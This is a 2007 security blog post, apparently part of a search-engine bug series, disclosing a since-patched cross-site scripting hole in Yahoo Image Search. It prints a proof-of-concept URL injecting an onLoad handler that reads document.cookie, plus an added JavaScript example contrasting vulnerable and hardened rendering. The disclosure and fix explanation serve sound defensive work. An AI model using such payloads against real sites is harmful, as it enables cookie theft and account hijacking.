MOSEB-02: Vulnerability at search.yahoo.com

18:36 02.06.2007

The next participant of the project is the Yahoo search engine. It is the 2nd of the top search engines in the world.

The vulnerability is in Image Search of Yahoo! Search (http://images.search.yahoo.com). I found this Cross-Site Scripting hole on 08.04.2007.

XSS:

The vulnerability is in the rcurl parameter:
http://images.search.yahoo.com/search/images/view?rcurl=%22%20onLoad=%22javascript:alert(document.cookie)&rurl=test

Moral: searching for images can be dangerous.
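
Why a URL of this shape works, and the fix, as an added example (not Yahoo's code and not part of the original post). It assumes the decoded rcurl value was written unescaped into a double-quoted HTML attribute, which the shape of the payload implies; the iframe tag and all function names are hypothetical.

```javascript
// Added example: renderVulnerable, renderHardened and the <iframe> tag are hypothetical.
// Constructed sample input: the query string from the URL above.
const SAMPLE_QUERY = 'rcurl=%22%20onLoad=%22javascript:alert(document.cookie)&rurl=test';

function getParam(query, name) {
  return new URLSearchParams(query).get(name) ?? '';
}

// Before: the decoded value is concatenated into a double-quoted attribute.
// A literal " in the value ends the attribute, so the rest parses as new attributes.
function renderVulnerable(rcurl) {
  return '<iframe src="' + rcurl + '"></iframe>';
}

// HTML attribute encoding: the characters that can end an attribute value or start markup.
function escapeAttr(value) {
  return value.replace(/[&<>"']/g, (c) => (
    { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]
  ));
}

// Only absolute http(s) URLs are acceptable in a URL-bearing attribute.
function isHttpUrl(value) {
  try {
    const u = new URL(value);
    return u.protocol === 'http:' || u.protocol === 'https:';
  } catch {
    return false;
  }
}

// After: validate the scheme first, then encode for the attribute context.
function renderHardened(rcurl) {
  const safe = isHttpUrl(rcurl) ? rcurl : 'about:blank';
  return '<iframe src="' + escapeAttr(safe) + '"></iframe>';
}

const rcurl = getParam(SAMPLE_QUERY, 'rcurl');
console.log(renderVulnerable(rcurl)); // onLoad appears as a separate attribute
console.log(renderHardened(rcurl));   // rejected: not an http(s) URL
console.log(renderHardened('http://example.com/a.jpg?x="1"')); // quotes encoded
```

The scheme check and the encoding cover different cases: the check rejects non-http(s) values such as javascript: URLs, and the encoding keeps a legitimate URL containing quotes from closing the attribute.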


2 responses to “MOSEB-02: Vulnerability at search.yahoo.com”

  1. dasickis says:

    I think this has been patched.

  2. MustLive says:

    Yes, dasickis, it was patched already. I also rechecked this hole today and found that it has been fixed.

    Well done, Yahoo. You were not so lazy and found time for fixing. Keep watching, guys, I’ll mention Yahoo some more during the month.
